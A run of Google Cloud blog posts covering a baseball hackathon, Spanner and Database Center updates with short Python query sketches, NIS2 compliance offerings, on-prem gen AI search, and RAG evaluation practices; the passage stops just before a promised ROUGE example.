Google Cloud: Build, deploy, and scale your project with the power of Google Cloud Platform. We’re talking Vertex AI, BigQuery, Cloud Functions, and the full suite of tools you need to bring your vision to life.
Five challenges: step up to the plate
Bring innovation to the baseball fan experience in one of five ways:
Wild card – fan experience: Think outside the batter’s box! This is your chance to knock our socks off with any project that uses the provided datasets to redefine how fans experience the game we love.
Personalized fan highlights: Ditch the one-size-fits-all highlights! Build a system that curates personalized audio, video, and text digests based on a fan’s favorite teams, players, and even preferred language.
Real-time “tool tips”: Turn casual viewers into armchair analysts with an interactive application that delivers real-time strategic insights. Explain the “why” behind every steal, strikeout, and home run as it happens.
Generate Statcast data from old videos: Give classic games the Statcast treatment! Use computer vision to extract key metrics (pitch speed, exit velocity, etc.) from archival game footage. Think Moneyball meets the digital age.
Prospect prediction: Can your code spot the next MLB superstar? Build a platform that analyzes prospect data to project future MLB potential and career impact, leveraging historical comparisons and predictive modeling.
Be an all-star, see the All-Stars
Get ready to cash in on some serious prizes:
Overall Grand Prize: $20,000, $5,000 in Google Cloud credits, a chance to deliver a keynote demo at Google Cloud Next ’25 (April 9-11, 2025), tickets and travel to the conference, tickets to the 2025 MLB® All-Star Game® presented by Mastercard, a meeting with a Google team member, and social media promotion.
Best of Challenge Prizes (for each challenge): $5,000, $2,500 in Google Cloud credits, a chance to demo at Google Cloud Next ’25, tickets to the conference, a virtual meeting with a Google team member, and social media promotion.
Ready to code the future of baseball?
Head over to next2025challenge.devpost.com to learn more, review the rules, and register. It’s time to prove that your code is ready for the big leagues. See you on the diamond!
NPN. Must be age of majority. Ends 5:00 p.m. ET on 4 Feb 2025. See goo.gle/mlbhackathon. Major League Baseball trademarks and copyrights are used with permission of Major League Baseball. Visit MLB.com.
If you’re a regular reader of this blog, you know that 2024 was a busy year for Google Cloud. From AI to Zero Trust, and everything in between, here’s a chronological recap of our top blogs of 2024, according to readership. You’ll probably see some favorites on this list, and discover a few that you missed the first time around.
January
We started the new year strong, removing data transfer fees for anyone moving data off of our platform. Translation: Anyone doing cool things on Google Cloud (like using generative AI to analyze their microservices deployment) is doing it because they want to, not because they have to. And in business news, we shared how to make the most out of your data and AI in the coming year.
February
From local GPUs, to model libraries, to distributed system design, the second month of 2024 was the first of many to come where AI topics dominated the charts. Our Transform team explored gen AI’s impact on various industries.
March
If it wasn’t already obvious, this month’s top-read blogs showed that our core audience is developers pushing the boundaries of innovation. Business leaders, meanwhile, read about best practices for securely deploying AI on Google Cloud.
April
Watch out, here comes Google Cloud Next, where we made a record 218 announcements; the top three are listed here. Readers were also keen to hear about how Citadel Securities built out a research platform on Google Cloud.
May
We don’t always get it right, but when there’s a problem, we’re committed to providing you with accurate, timely information with which to make your own assessments. We’re also committed to making you, and customers like McLaren Racing, go really, really fast when developing new AI-based applications.
June
Whether you wanted to modernize your databases, deliver higher system reliability, create really cool AI-powered apps, or learn how legendary companies tackle data management, the Google Cloud blog was your go-to source midway through the year.
July
We talk a lot about “meeting customers where they are.” Sometimes that means a disaster zone, a remote research station, or a truck cruising down the highway. Over on Transform, you read about the history of our custom Axion and TPU chips.
August
Just when you thought you knew how to run AI inference, your available graph database options, or the name of Google Cloud’s event-driven programming service, we went and changed things up. We like to keep you on your toes 😉 And business readers got a first look at AI agents — more to come on this.
September
You’ve been generating (and storing) business data for years. Now, we’re making it easier for you to make sense of, and actually use, that data. Speaking of using data, the Transform team compiled a jaw-dropping list of the real-world ways customers are using gen AI in their organizations.
October
According to this month’s most-read blog, 75% of you rely on AI for at least one daily professional responsibility, including code writing, information summarization, and code explanation, and experience “moderate” to “extreme” productivity gains. So it was no big surprise that business leaders wanted to read about how to develop an AI strategy.
November
Not content to hold the existing record for most nodes in a Kubernetes cluster (15,000), we went ahead and more than quadrupled it, to the delight of AI unicorns. But whether you work for an AI unicorn, or just a plain old zebra, all Google Cloud users need to start using multi-factor authentication next year, as well as learn how to avoid common AI pitfalls.
December
We’re closing out the year on an AI high note, with the availability of amazing new image and video generation models, as well as the new Trillium TPU, which Google used to train Gemini 2.0, our most capable AI model… yet. Be on the lookout for how these technologies — and many others — will reshape your industry and how you work in the coming year.
Spanner is Google’s always-on, virtually unlimited database that powers planet-scale applications like Gmail, YouTube, and Google Photos. Outside of Google, Spanner powers demanding workloads for household brands like Yahoo!, The Home Depot, Wayfair, and Pokémon Go. Today, Spanner handles over 4 billion queries per second at peak and more than 15 exabytes of data, with five 9s of availability, plus global consistency.
Since we first discussed it in 2012, Spanner has evolved from a groundbreaking distributed SQL database into a versatile, intelligent innovation platform. 2024 was a big year for Spanner, with multiple launches that expanded its functional capabilities, pushed the envelope on price-performance, re-architected it for best-in-class reliability and security, and enhanced the developer experience. Here is a recap of Spanner’s biggest innovations of the year and how you can benefit from them.
1. Multi-model — one database, many possibilities
With the launch of Spanner Graph, full-text search and vector search, Spanner went from being a highly available, globally consistent and scalable database, to a multi-model database with intelligent, interoperable capabilities with which you can build AI-enabled applications. Unlike other multi-model databases on the market, Spanner offers a true multi-model experience that allows interoperability between different data models without downtime.
Spanner’s multi-model support lets you consolidate databases, saving on costs and reducing operational overhead, governance, and security touchpoints, while its interoperability eliminates data movement for a “true ZeroETL” experience with consistent data across all models. This helps enable use cases like near-real-time fraud detection, supply chain optimization, or product recommendations.
Fig1: A SQL query on Spanner showing interleaved usage of graph, relational, and vector models and full-text search
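As a concrete illustration of this multi-model experience, below is a minimal sketch of issuing a Spanner Graph (GQL) query through the Python client library. The instance, database, and graph schema are hypothetical stand-ins (FinGraph mirrors the naming used in Spanner Graph samples), not the exact query from the figure.

```python
# Minimal sketch: issuing a Spanner Graph (GQL) query from Python.
# The instance, database, graph, and property names are hypothetical.
from google.cloud import spanner

client = spanner.Client()
database = client.instance("my-instance").database("my-database")

with database.snapshot() as snapshot:
    # Graph queries go through the same execute_sql API as regular SQL,
    # so relational, full-text, and vector queries can live side by side.
    results = snapshot.execute_sql(
        """
        GRAPH FinGraph
        MATCH (p:Person)-[:Owns]->(a:Account)
        RETURN p.name AS owner, a.account_id AS account_id
        """
    )
    for owner, account_id in results:
        print(owner, account_id)
```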
2. Improving price-performance
Spanner’s price-performance lets you dream big, start small (for as little as $65/mo), and scale linearly with no cliffs. In 2022, we increased the storage per node from 2TB to 4TB, and in 2023 we built on this with a 50% increase in throughput and a 2.5X increase in storage at no additional cost.
This year, with the launch of new multi-model capabilities, we wanted to make it simple and cost-effective for you to use these capabilities without charging incrementally for every new feature. The result was Spanner editions, an intuitive, tier-based pricing approach that offers different capabilities at various price points to fit your diverse needs and budgets, all while providing flexibility, cost transparency, and additional cost-saving opportunities.
3. A new home for your Cassandra workloads
The Cassandra NoSQL database is prized for its speed and scalability. It also has limitations, such as limited support for complex queries and difficulty modeling intricate relationships. Spanner combines the scalability and availability of NoSQL with the strong consistency and relational model of traditional databases, for the best of both worlds.
This year, we launched the Cassandra to Spanner Proxy Adapter, an open-source, plug-and-play tool that makes it easier than ever to move your Cassandra workload to Spanner with near-zero changes to your application logic. Customers like Yahoo! and Reltio are loving the ease of use of the Cassandra proxy adapter, and we’re excited to help customers be more successful with Cassandra on Spanner.
4. Generative AI and the Spanner ecosystem
Over the past year, we’ve witnessed a remarkable shift in how organizations leverage generative AI. But gen AI comes with risk of hallucinations. We believe that transactional and analytical databases can help reduce these, bridging the gap between foundation models and enterprise gen AI apps. Here’s how:
Vector support: With vector support for Spanner, developers can perform similarity searches on vector embeddings stored in the database. Spanner vector search supports both exact KNN and approximate ANN searches powered by Google’s scalable nearest neighbor (ScaNN) algorithm, providing flexibility for different workloads and fast, accurate results even on large datasets. Spanner now supports vector searches scaling to more than 10 billion vectors. Developers can combine vector searches with regular SQL and graph GQL queries to power use cases like RAG applications (a query sketch follows this list).
BigQuery and Spanner better together: New, groundbreaking integrations between Spanner and BigQuery help businesses connect operational and analytical workloads, to unlock valuable insights and drive better decision-making. Spanner external datasets in BigQuery allow you to query transactional data residing in Spanner directly within BigQuery, without needing to move or duplicate data. Spanner now also supports reverse ETL from BigQuery, so you can export data from BigQuery to Spanner and operationalize the analytical insights that BigQuery enables.
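To ground the vector-support item above, here is a minimal exact-KNN sketch using the Spanner Python client. The table, columns, instance, and database names are hypothetical stand-ins, and the query embedding would normally come from an embedding model.

```python
# Minimal sketch: exact KNN vector search in Spanner from Python.
# Table and column names are hypothetical; COSINE_DISTANCE is Spanner's
# built-in distance function for ARRAY<FLOAT64> embeddings.
from google.cloud import spanner
from google.cloud.spanner_v1 import param_types

client = spanner.Client()
database = client.instance("my-instance").database("my-database")

query_embedding = [0.12, -0.34, 0.56]  # normally produced by an embedding model

with database.snapshot() as snapshot:
    results = snapshot.execute_sql(
        """
        SELECT doc_id, content
        FROM documents
        ORDER BY COSINE_DISTANCE(embedding, @query_embedding)
        LIMIT 10
        """,
        params={"query_embedding": query_embedding},
        param_types={"query_embedding": param_types.Array(param_types.FLOAT64)},
    )
    for doc_id, content in results:
        print(doc_id, content)
```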
5. Reliability, availability, security, and governance
Spanner customers expect the highest levels of reliability, availability, security, and governance controls for their mission-critical workloads. This year, we launched support for dual-region configurations and geo-partitioning to help you improve your availability SLAs, improve application performance for multi-region workloads, and meet governance requirements.
Dual-region support: Spanner dual-region configurations help meet local residency requirements while providing five 9s of availability and zero recovery-point objective (RPO) guarantees in geographies with only two regions.
Geo-partitioning: You can partition your table data at the row-level across the globe, to serve data closer to your users. With geo-partitioning, Spanner customers across industries like gaming, e-commerce, and financial services can provide their users reduced application latency, optimized costs, and data residency benefits such as storing sensitive user data within geographic jurisdictions.
At Google Cloud, we strive to make it ridiculously simple to build and manage applications built on our databases, including Spanner.
Protobuf improvements: Protocol Buffers, or protobuf, is a language-neutral way to encode and decode data structures for efficient transport and storage. You can now manage protobuf values in Spanner and access their fields using the dot operator in SQL, e.g., dimensions.size.width, without having to normalize into tables upfront. This dramatically simplifies writing queries that need to filter, group, or order by specific values within a protobuf.
Troubleshooting and Database Center support: Database Center is an AI-powered, unified database management solution to monitor and manage diverse database services. This year, customers gained the ability to use Database Center to manage their Spanner databases. We also added support for end-to-end tracing and client tracing to make it easier to troubleshoot performance issues.
We are proud of what we have delivered for customers in 2024, and are excited to see the innovative solutions you are building on Spanner. Needless to say, we are just getting started and we have a lot more exciting capabilities lined up for 2025.
Get started
Want to learn more about what makes Spanner unique and how it’s being used today? Try it yourself for free for 90 days, or get a production-ready instance for as little as $65 USD/month that grows with your business without downtime or disruptive re-architecture.
Google Cloud’s Database Center provides a unified fleet management solution to help manage your databases at scale. In October 2024, Database Center was made available to all Google Cloud customers, with support for Cloud SQL, AlloyDB and Spanner engines.
Today we are expanding Database Center’s capabilities with the addition of Bigtable, Memorystore, and Firestore databases in preview. You now have a single, unified view where you can:
Gain a comprehensive view of your entire database fleet across all Google Cloud managed databases. No more silos of information or hunting through bespoke tools and spreadsheets.
Proactively de-risk your database fleet with intelligent and actionable availability and data protection recommendations for Bigtable and Firestore databases.
Optimize your database fleet with AI-powered assistance using a natural language interface to answer questions about all your Google Cloud databases, and quickly resolve fleet issues through optimized recommendations.
Let’s take a deeper look at the new Database Center capabilities for Bigtable, Memorystore, and Firestore.
Gain a comprehensive view of your database fleet
Database Center simplifies database management with a single, unified view of all your Google Cloud managed database services, including Bigtable, Memorystore and Firestore. You can monitor these database resources across your entire organization, spanning multiple engines, versions, regions, projects, and environments or applications using labels. Specifically, Database Center now lets you:
Identify out-of-date database versions to ensure proper support and reliability
Track version upgrades, e.g., whether Memorystore Redis 6.x to Memorystore Redis 7.0/7.2 upgrades are proceeding at the expected pace
Ensure database resources are appropriately distributed, e.g., identify the number of Bigtable, Firestore, Memorystore databases powering the critical production applications vs. non-critical dev/test environments
Detect and troubleshoot diverse database issues across the entire fleet
Proactively de-risk your database fleet with intelligent recommendations
We’ve expanded Database Center’s proactive monitoring and issue-resolution capabilities to support Bigtable and Firestore, helping to ensure optimal availability and data protection for your existing database fleet. For instance, Database Center:
Proactively monitors Bigtable instances, detecting and helping to resolve failover gaps to minimize downtime and prevent service disruption
Publishes recommendations related to unsuccessful backup attempts, missing automated backup policies, and short backup retention periods for your Bigtable instances. It’s important to address these issues quickly to ensure data can be recovered.
Enhances data availability and durability by protecting against system failures and regional outages for your Bigtable instances.
Helps safeguard your critical data in Firestore by detecting if any tables lack an automated backup policy, so you can prevent data loss from accidents or corruption
In short, when issues arise, Database Center guides you through intuitive troubleshooting steps, streamlining resolution and minimizing downtime for your Bigtable and Firestore deployments. It goes beyond problem identification to provide clear, actionable solutions. Recommendations for Memorystore are coming to Database Center soon along with additional recommendations for other engines!
Detecting and troubleshooting diverse database issues across the entire fleet.
Optimize your database fleet with AI-powered assistance
With Gemini enabled, Database Center makes optimizing your database fleet incredibly intuitive. Chat with the AI-powered interface to get precise answers, uncover issues within your database fleet, troubleshoot problems, and implement solutions. AI-powered chat in Database Center now includes support for Bigtable, Memorystore, and Firestore. For example, Gemini can help you quickly identify Firestore resources that do not have automated backup policies.
A natural language interface to ask questions about Bigtable, Memorystore, and Firestore databases.
Get started with Database Center today
With today’s launch, Database Center now provides you a single, unified view across all your Google Cloud managed databases. You can access the Database Center within the Google Cloud console and begin monitoring and managing your entire database fleet. To learn more about Database Center’s capabilities, check out the documentation.
As the year winds down and we gather around the (digital) fireplace, the excitement around Google Cloud databases is ramping up! It’s been a busy season of innovation and customer success, and we’ve got a sack full of updates to share. Join us for a festive feast of news, including key announcements in the databases space, cool product updates and feature notes, inspiring customer stories, and a calendar of events to ring in the new year. So grab a cup of hot cocoa, settle in, and let’s unwrap the latest happenings from Google Cloud databases.
Key database announcements
[Forrester Wave] Google was named a Leader in The Forrester Wave™: Translytical Data Platforms, Q4 2024 report, earning the highest score possible in 11 criteria, including vision, innovation, gen AI/LLM, real-time analytics, and data security. We believe this recognition solidifies AlloyDB as Google Cloud’s fastest-growing database and a top choice for supporting transactional and analytical workloads with exceptional performance, availability, and scale.
Advanced DR for PostgreSQL and MySQL now in GA – Advanced DR, a combination of switchover and replica failover along with a write endpoint (in Preview), provides seamless disaster recovery testing and execution without requiring application changes.
Cloud SQL Enterprise Plus for PostgreSQL and MySQL got two new features that improve availability:
Data cache enable/disable – Allows users to enable or disable data cache with near-zero downtime for MySQL and PostgreSQL primary instances.
Instance scaledown – Near-zero downtime is now available for infrequent instance scaledowns on Enterprise Plus for MySQL and PostgreSQL primary instances.
Private Service Connect (PSC) Automation is in Preview – Customers can automate the creation of Cloud SQL PSC endpoints in their VPCs. This dramatically simplifies the deployment of Cloud SQL using PSC especially at scale.
Cloud SQL Studio now supports IAM Authentication for MySQL and PostgreSQL (doc).
AlloyDB for PostgreSQL
Model endpoint management allows customers to access third-party and custom hosted models directly from their database. The extension enabling AI model predictions and embedding generation is now installed by default in new databases. Vertex AI’s latest models are available with no setup.
Single shard clusters for Memorystore for Redis Cluster are now GA – Customers can create Memorystore instances with a single shard and dynamically scale the instance size up or down, while maintaining a 99.99% SLA with multi-zone instances that have replicas.
Node-level metrics for Memorystore for Redis Cluster are now GA – Node-level metrics give Memorystore customers advanced monitoring capabilities to better manage their clusters.
OSS Autoscaler for Memorystore Cluster is now GA – The OSS autoscaler ensures that customer clusters are automatically optimized for performance, capacity, and budget.
Directed reads feature is now GA – Spanner provides the flexibility to route read traffic (except in RW transactions) to a specific replica type or region within a multi-region instance configuration or a custom regional configuration with optional read-only region(s).
Query Optimizer version 7 is now in GA – Spanner’s query optimizer now rewrites OR operators on indexed columns as a UNION MERGE, improving efficiency by avoiding full table scans.
Usage statistics and insights dashboard for database splits is now GA – Spanner’s new observability feature helps identify and address performance hotspots by showing how data is distributed across splits (slide).
Firestore Key Access Justifications (KAJ) is now GA – Key access justifications provide customers with more control over data access and the ability to manage key access requests.
Monitoring page on Firestore console allows customers to view available metrics, create a custom dashboard, and set alerts directly from the Firestore console.
Businesses transforming with Google Cloud databases
Discover how Google Cloud database solutions are driving innovation and success:
Ford Pro Intelligence leverages Google Cloud’s Bigtable to harness the power of connected vehicle data, providing real-time insights and predictive maintenance for fleets of all sizes.
Fire up your innovation engine with Spanner: Today’s applications demand more than traditional databases can deliver. In this webinar, we explore Spanner, the ‘always-on’ globally available database that scales effortlessly to power your next-generation innovations.
Maximize performance with Cloud SQL and Memorystore: In this webinar, we’ll show you the combined power of Cloud SQL and Memorystore to reduce costs, improve efficiency, and deliver exceptional application experiences.
Cloud Wars with Bob Evans: In this episode of Cloud Wars, Bobby Brauer, head of geospatial data engineering at Bayer, discusses their innovative use of AlloyDB. Bayer is using AlloyDB to overcome data challenges in agriculture. AlloyDB provides low-latency data processing and high availability, crucial for handling spikes in data flow during harvest season. Learn how Bayer is transforming geospatial data processing to enhance efficiency and drive data-driven decision-making.
Merv Adrian x Apex Fintech | AlloyDB: In the rapidly evolving PostgreSQL DBMS landscape, AlloyDB is emerging as a top choice for organizations with demanding workloads. Join Merv Adrian for an interview with Apex Fintech, a leading provider of brokerage and wealth management services, as they share their experience with AlloyDB and how it helps them achieve high availability and robust security.
Get started
Google Cloud offers the only suite of industry-leading databases built on planet-scale infrastructure and for AI. Learn more and start a free trial today:
With the European Commission’s adoption of the Network and Information Systems Directive 2.0, or NIS2, Europe is taking an essential step forward in its strategy to protect consumers, businesses, and government organizations from escalating threats in cyberspace. NIS2 will help to drive a consistent high level of security and resilience across key sectors of the European economy.
NIS2 also represents a seismic shift in the expectations and obligations of private entities to adhere to cybersecurity best practices, and to factor security into everyday business decisions. For European organizations, including Google Cloud customers, NIS2 may require new investments in security tools, talent, and processes to achieve a higher overall security baseline. Customers should consider this an opportunity to use the cloud as a platform for managing risk and for streamlining compliance.
Google Cloud and Google Workspace offer a range of tools and resources to help customers meet their NIS2 compliance goals through building secure and resilient applications, managing cyber risks, responding to incidents, and enabling new modes of business built atop a secure foundation.
NIS2: Compliance challenge or opportunity?
NIS2 outlines new security requirements for tens of thousands of essential and important entities in critical sectors, including energy, transportation, healthcare, financial services, and digital infrastructure. Covered entities must adopt risk management practices, establish business continuity plans, enhance supply chain security practices, develop cyber hygiene and training programs, and implement more rigorous minimum security controls.
In addition, entities must report “significant” cyber incidents to the relevant national authorities. Failure to comply could lead to enforcement measures including costly fines and reputational damage.
NIS2 and other regulations are already translating into higher cybersecurity spending. European organizations expect to allocate an average of 9% of their IT budgets to security in 2024 – up from 7.1% in 2023, according to recent research by ENISA, the European Union Agency for Cybersecurity.
Still, organizations continue to struggle to hire and retain sufficient numbers of skilled cybersecurity professionals. As a result, organizations that succeed in driving down the complexity and cost of meeting their NIS2 requirements will be at a competitive advantage over those that do not.
At Google Cloud, we believe in shared fate and in our commitment to support customers as a trusted partner in their security and compliance journeys. We provide customers industry-leading tools to enhance visibility into their online assets and to address risks.
We can help customers achieve a higher security baseline through strong inherited controls, such as encryption and multi-factor authentication (MFA). For example, Google Workspace customers experienced three times fewer incidents than those using Microsoft 365, according to a study by cyber-insurer At Bay.
We also simplify IT lifecycle management and enable customers to focus on managing their businesses, rather than managing technical debt. We also partner closely with regulators to build trust and to support customer regulatory compliance needs on-demand.
For these reasons, European customers should strongly consider partnering with Google Cloud to meet their compliance goals.
How Google Cloud can help our customers achieve their NIS2 goals
Google Cloud offers a set of solutions and resources to help guide customers through their NIS2 compliance journey.
Risk management: Under NIS2, covered organizations must take appropriate information risk management measures based on international and European standards, including performing risk assessments and implementing a risk treatment plan.
First, with management now accountable for managing cyber risks under NIS2, we offer a range of free educational resources on the topic of risk governance, including best practice guides and our Insights Hubs for CISOs and for boards of directors. Even before moving to the cloud, organizations can use our Risk Assessment and Critical Asset Discovery solution to evaluate their current IT risks, identify where critical assets reside, and view recommendations for improving their security posture and resilience.
Once in the cloud, customers can take advantage of Google Cloud Monitoring to view the real-time performance, availability, and health of their applications and infrastructure. Security Command Center Enterprise provides organizations visibility into their security posture and empowers them to surface and remediate vulnerabilities and misconfigurations.
Partnering with Google Cloud also allows customers to take advantage of our extensive compliance offerings, best practices, and easy access to documentation. Our products routinely undergo independent verification of security, privacy, and compliance controls captured in frameworks such as ISO/IEC 27001, which is aligned to NIS2 requirements referenced in the draft ENISA Implementing Guidance.
Incident handling: NIS2 requires covered entities to monitor for cyber threats and notify national authorities of significant incidents within 24 hours, file a detailed incident report within 72 hours, and issue a comprehensive final report within one month.
For incident management in the cloud, Google Security Operations (SecOps) offers security practitioners a modern platform for threat monitoring, detection, investigation, and response. The SecOps platform provides organizations the ability to tap into insights from Google Threat Intelligence to track novel threats, as well as analyze petabytes of telemetry and collaborate on cases using a single platform. Built-in generative AI unlocks the ability to create custom incident playbooks on-demand to accelerate response and reporting.
Google Cloud customers and non-customers alike can tap into Mandiant Incident Response services for in-depth forensic analysis, crisis management support, and recovery operations.
Google Cloud will notify customers of service disruptions impacting the underlying products and services they rely on using programmatic alerts via our Personalized Service Health Dashboard and via public dashboards. Google Cloud also notifies customers of security and privacy incidents via Advisory Notifications.
Business continuity: NIS2 requires organizations to implement tools and processes to ensure business continuity in the event of significant cyber incidents, including establishing an incident response team or creating backups.
There is growing recognition among customers and policymakers that cloud-based tools offer advantages in sustaining a high level of operational resilience. We perform rigorous disaster recovery testing to ensure our infrastructure will continue to run despite a range of disaster scenarios. Our data centers are certified as ISO/IEC 22301 compliant after undergoing an independent audit.
Minimum security requirements: NIS2 requires covered organizations to adopt basic security controls and technologies, such as encryption, MFA, and identity and access management.
Customers can review our whitepaper on how we design security into Google Cloud infrastructure from the ground up. Our security model starts with overlapping physical security measures to protect Google data centers and network infrastructure. We use specially-designed Titan hardware security chips to authenticate legitimate Google devices and to verify the integrity of the software components.
Zero trust is at the core of Google Cloud’s security model: our infrastructure continuously authenticates and authorizes every identity, device, and service to prevent lateral movement on the network. We encrypt customer data at-rest and communications in-transit between data centers.
As a covered entity, Google Cloud will be responsible for meeting cyber risk management and incident handling requirements under NIS2 while supporting our customers along their compliance journeys. We are working closely with national authorities to demonstrate the strength of our security model and our compliance with all NIS2 requirements.
NIS2 requires covered entities to implement strong supply chain risk management measures, including the need to codify minimum security requirements in supplier contracts and service level agreements. Customers can learn more about Google Cloud’s contractual responsibilities with respect to physical security, vulnerability management, incident notification, personnel skills and training, and subprocessor security by reviewing our Cloud Data Processing Addendum. Please contact your Google Cloud representative for further details.
To help European organizations train and hire the next generation of cybersecurity professionals, we’ve awarded thousands of scholarships for the Google Cybersecurity Certificate program. In addition, Google.org will award $15 million over the next year to support hands-on cybersecurity education at universities across Europe, Africa, and the Middle East as part of our Cybersecurity Seminars program.
We’re also proud to support the European Union and EU member states in efforts to combat malicious cyber activity targeting European businesses, governments, and individuals. Our cybersecurity teams already collaborate closely with more than a dozen European governments to share intelligence and disrupt threats. Customers and partners of all sizes can take advantage of free threat analysis resources we publish on our Threat Intelligence blog.
NIS2 represents an essential step forward in strengthening Europe’s collective cyber resilience. As a technology provider and security innovator, Google Cloud will continue to support our customers as we work together to build a safer Internet for all.
Today, generative AI is giving organizations new ways to process and analyze data, discover hidden insights, increase productivity and build new applications. However, data sovereignty, regulatory compliance, and low-latency requirements can be a challenge. The need to keep sensitive data in certain locations, adhere to strict regulations, and respond swiftly can make it difficult to capitalize on the cloud’s innovation, scalability, and cost-efficiency advantages.
Google Distributed Cloud (GDC) brings Google’s AI services anywhere you need them — in your own data center or at the edge. Designed with AI and data-intensive workloads in mind, GDC is a fully managed hardware and software solution featuring a rich set of services. It comes in a range of extensible hardware form factors, with leading industry independent software vendor (ISV) solutions integrated via GDC Marketplace, and your choice of whether to run it connected to Google Cloud’s systems or air-gapped from the public internet.
In this blog post, we dive into the details of how GDC’s new AI-optimized servers with NVIDIA H100 Tensor Core GPUs and our gen AI search packaged solution — now available in preview — allow you to bring increasingly popular retrieval-augmented generation (RAG) to your on-premises environment, and unlock multimodal and multilingual natural-language search experiences across your text, image, voice, and video data.
Gen AI-optimized infrastructure
GDC air-gapped now incorporates new servers with NVIDIA H100 GPUs, powered by the advanced NVIDIA Hopper architecture and 5th Gen Intel Xeon Scalable processors. The new servers introduce the GPU-optimized A3 VM family, optimized for the NVIDIA NVLink interconnect, to GDC, enabling faster shared compute and memory for AI workloads using large language models (LLMs) with up to 100 billion parameters. They also extend the set of NVIDIA Multi-Instance GPU (MIG) profiles, supporting a variety of new GPU slicing schemes (both uniform and mixed-mode) and dynamic allocation of GPU resources to serve AI services at a lower cost of ownership.
Ready-to-deploy on-prem conversational search
With GDC’s new gen AI Search solution, you get a ready-to-deploy, on-prem conversational search solution based on the Gemma 2 LLM with 9 billion parameters. You can easily ingest your sensitive on-prem data into the search solution and quickly find the most relevant information and content via natural language search, boosting employee productivity and knowledge sharing, while helping ensure that the search queries and data remain on-prem.
Responses also include citation links to your original documents so you can easily verify all answers to reduce hallucinations. Watch the demo below to see the solution in action:
For more accurate responses, the GDC gen AI search solution relies on a RAG architecture that combines the benefits of traditional search and generative AI: user queries are augmented with relevant on-prem data before they’re sent to the LLM to generate responses. Other core integrations available out-of-the-box include Vertex AI pre-trained APIs (translation for 105 languages, speech-to-text for 13 languages, and optical character recognition for 46 supported and 24 experimental languages) for multimodal and multilingual data ingestion across text, images, and audio. It also includes the AlloyDB Omni database service for embeddings storage and semantic search across ingested data.
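As an illustration of how the retrieval leg of such a RAG pipeline might look, here is a minimal sketch of a semantic search against AlloyDB Omni using the pgvector-compatible vector extension. The connection string, table schema, and embedding dimensionality are hypothetical, and in the packaged solution this plumbing is provided for you.

```python
# Minimal sketch: semantic retrieval against AlloyDB Omni for a RAG pipeline.
# Assumes the pgvector-compatible "vector" extension and a hypothetical
# chunks(id, content, embedding vector(768)) table; the DSN is a placeholder.
import psycopg2

def retrieve_context(query_embedding, k=5):
    # pgvector expects a bracketed, comma-separated literal, e.g. '[0.1,0.2]'.
    vector_literal = "[" + ",".join(str(x) for x in query_embedding) + "]"
    conn = psycopg2.connect("host=alloydb-omni.internal dbname=rag user=search")
    try:
        with conn.cursor() as cur:
            cur.execute(
                """
                SELECT id, content
                FROM chunks
                ORDER BY embedding <=> %s::vector  -- cosine distance
                LIMIT %s
                """,
                (vector_literal, k),
            )
            return cur.fetchall()
    finally:
        conn.close()

# The retrieved rows are then prepended to the user query before it is
# sent to the on-prem LLM (Gemma 2 in the packaged solution).
```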
GDC’s open cloud approach also allows you to customize this solution according to your needs and swap any components as you see fit, including for other database services like Elasticsearch, other open-source models and LLMs, or your own proprietary models.
Get started on your GDC development journey
To join GDC’s gen AI search solution preview and experience how on-prem gen AI search can transform how your organization retrieves information, contact your Google account representative. Note that you will need a GDC deployment where you can deploy and run the preview.
Retrieval-augmented generation (RAG) supercharges large language models (LLMs) by connecting them to real-time, proprietary, and specialized data. This helps LLMs deliver more accurate, relevant, and contextually aware responses, minimizing hallucinations and building trust in AI applications.
But RAG can be a double-edged sword: while the concept is straightforward – find relevant information and feed it to the LLM – its implementation is difficult to master. Done incorrectly, it can impact user trust in your AI’s reliability. The culprit is often a lack of thorough evaluation. RAG systems that are not thoroughly evaluated lead to ‘silent failures’ which can undermine the reliability and trustworthiness of the system as a whole.
In this blog post, we’ll equip you with a series of best practices to identify issues within your RAG system and fix them with a transparent, automated evaluation framework.
Step 1. Create a testing framework
Testing a RAG system consists of running a set of queries against the tool and evaluating the output. A key prerequisite for rapid testing and iteration is to decide on a set of metrics as the definition of success, and calculate them in a rigorous, automated, and repeatable fashion. Below are some guidelines:
Assemble a test dataset of high-quality questions
Ensure that your test set covers a broad subset of the underlying data, and includes variations in phrasing and question complexity that match real-world use cases.
Pro tip: It’s a good idea to consult with stakeholders and end users here to ensure the quality and relevance of this dataset.
Assemble a ‘golden’ reference dataset of desired outputs to use in evaluation
Although some metrics can be calculated without a reference dataset, having a set of known-good outputs allows us to produce a more comprehensive and nuanced range of evaluation metrics.
Only change one variable at a time between test runs
There are many features of a RAG pipeline that can make a difference – by changing them one at a time, we can be sure that a change in evaluation scores is attributable to a single feature alone.
Similarly, we must ensure that between test runs we do not change the evaluation questions being used, the reference answers, or any system-wide parameters and settings.
The basic process here is to change one aspect of the RAG system, run the battery of tests, adapt the feature, run the exact same battery of tests again and then see how the test results have changed. Once you are satisfied that a feature cannot be improved, freeze the configuration and move on to testing a separate part of the process.
This testing framework can be visualized as three components:
Reference questions and answers: The set of queries to be evaluated. Depending on which metrics are being calculated, we may include corresponding reference answers.
RAG processes: The retrieval and summarization techniques being changed and evaluated.
Question outputs: The evaluation outputs as scored by the testing framework.
Choosing appropriate metrics
Establishing the best metrics to assess your system involves trial and error. Predefined testing frameworks exist that have been designed to speed up the process by providing prebuilt metrics that can also be adapted to your specific use case. This allows you to quickly generate baseline scores for the evaluation and refinement of your RAG system. From this baseline, you can then systematically modify retrieval and generation capabilities and measure any improvements.
Common RAG evaluation frameworks include:
Ragas
Ragas is an open-source tool for evaluating RAG systems. It measures key aspects like factual accuracy, answer relevance, and how well retrieved content matches the question. Ragas also helps generate test data, making it easier for developers to improve RAG systems for accuracy and usefulness.
Vertex AI gen AI evaluation service
The Vertex AI gen AI evaluation service helps users test and compare generative models or applications based on custom metrics. It supports model selection, prompt engineering, and fine-tuning and allows users to define metrics, prepare data, run evaluations, and review results. The service works with Google’s models, third-party models, and open models across various languages, using both model-based and computation-based assessment methods.
Example metrics
Model-based metrics utilize a proprietary Google model to assess the output of a candidate model. Functioning as an evaluator, this model scores responses based on predefined criteria.
Pointwise metrics: The judge model assigns a numerical score (e.g., on a scale of 0-5) to the candidate model’s output, indicating its alignment with the evaluation criteria. A higher score signifies a better fit.
Pairwise metrics: The judge model compares the responses of two models and identifies the superior one. This approach is frequently employed to benchmark a candidate model against a baseline model.
Computation-based metrics: These metrics utilize mathematical formulas to compare the model’s output against a ground truth or reference. Popular examples include ROUGE and BLEU.
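As a concrete example of a computation-based metric, the sketch below scores a candidate answer against a golden reference with the open-source rouge-score package; the reference and candidate strings are made-up illustrations.
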